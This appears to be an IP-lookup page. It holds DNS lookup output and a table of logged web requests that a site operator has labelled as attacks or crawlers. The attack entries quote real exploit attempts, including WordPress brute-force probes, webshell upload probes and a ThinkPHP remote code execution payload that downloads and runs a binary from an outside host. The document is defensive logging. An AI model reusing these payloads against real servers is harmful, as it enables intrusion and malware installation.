City: Redmond
Region: Washington
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 99.24.77.166
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 23081
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;99.24.77.166. IN A
;; AUTHORITY SECTION:
. 573 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019110300 1800 900 604800 86400
;; Query time: 109 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Nov 03 15:41:56 CST 2019
;; MSG SIZE rcvd: 116
Host 166.77.24.99.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 166.77.24.99.in-addr.arpa: NXDOMAIN
| IP | Type | Details | Datetime |
|---|---|---|---|
| 139.199.87.173 | attack | 139.199.87.173 - - [29/Mar/2019:07:19:11 +0800] "POST /xmlrpc.php HTTP/1.1" 404 3693 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" WP攻击 |
2019-03-29 07:22:13 |
| 58.251.121.184 | attack | 58.251.121.184 - - [01/Apr/2019:15:40:52 +0800] "GET /super.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:15:40:52 +0800] "GET /ww.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 15:41:42 |
| 118.25.49.95 | attack | 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-01 09:39:56 |
| 144.217.70.190 | attack | 144.217.70.190 - - [02/Apr/2019:09:51:04 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" 144.217.70.190 - - [02/Apr/2019:09:51:05 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" |
2019-04-02 10:21:51 |
| 42.236.55.21 | bots | 不常见的360爬虫。。 |
2019-03-29 10:37:48 |
| 180.153.234.234 | bots | 360爬虫列表
180.153.232.*
180.153.234.*
180.153.236.*
180.163.220.*
42.236.101.*
42.236.102.*
42.236.103.*
42.236.10.*
42.236.12.*
42.236.13.*
42.236.14.*
42.236.15.*
42.236.16.*
42.236.17.*
42.236.46.*
42.236.48.*
42.236.49.*
42.236.50.*
42.236.51.*
42.236.52.*
42.236.53.*
42.236.54.*
42.236.55.*
42.236.99.* |
2019-03-28 20:23:09 |
| 207.46.13.229 | bots | 微软bingbot |
2019-03-29 09:12:04 |
| 193.201.224.220 | attack | wordpress 暴力破戒攻击 193.201.224.220 - - [31/Mar/2019:18:05:02 +0800] "POST /wp-login.php HTTP/1.1" 200 5002 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" |
2019-03-31 19:57:42 |
| 42.156.136.98 | bots | YisouSpider 就是神马搜索的爬虫 42.156.136.98 - - [29/Mar/2019:08:27:04 +0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.1.1 HTTP/1.1" 200 8104 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safa ri/537.36" |
2019-03-29 09:13:21 |
| 58.251.121.186 | attack | 58.251.121.186 - - [01/Apr/2019:09:55:29 +0800] "GET /spider.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:09:55:29 +0800] "GET /spider.php HTTP/1.1" 404 209 "http://118.25.52.138/spider.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 09:58:24 |
| 203.208.60.13 | bots | 谷歌中国爬虫 |
2019-03-30 08:42:08 |
| 76.237.130.233 | attack | 76.237.130.233 - - [01/Apr/2019:19:03:08 +0800] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 76.237.130.233 - - [01/Apr/2019:19:03:09 +0800] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 76.237.130.233 - - [01/Apr/2019:19:03:10 +0800] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-01 19:53:21 |
| 66.102.6.142 | bots | 谷歌icon爬虫 66.102.6.142 - - [29/Mar/2019:09:01:33 +0800] "GET / HTTP/1.1" 200 29010 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon" |
2019-03-29 09:18:49 |
| 58.251.121.184 | attack | 58.251.121.184 - - [01/Apr/2019:21:02:29 +0800] "GET /qw.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.184 - - [01/Apr/2019:21:02:29 +0800] "GET /qw.php HTTP/1.1" 404 209 "http://118.25.52.138/qw.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 21:05:42 |
| 138.197.77.207 | attack | 138.197.77.207 - - [01/Apr/2019:06:39:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" |
2019-04-01 06:59:47 |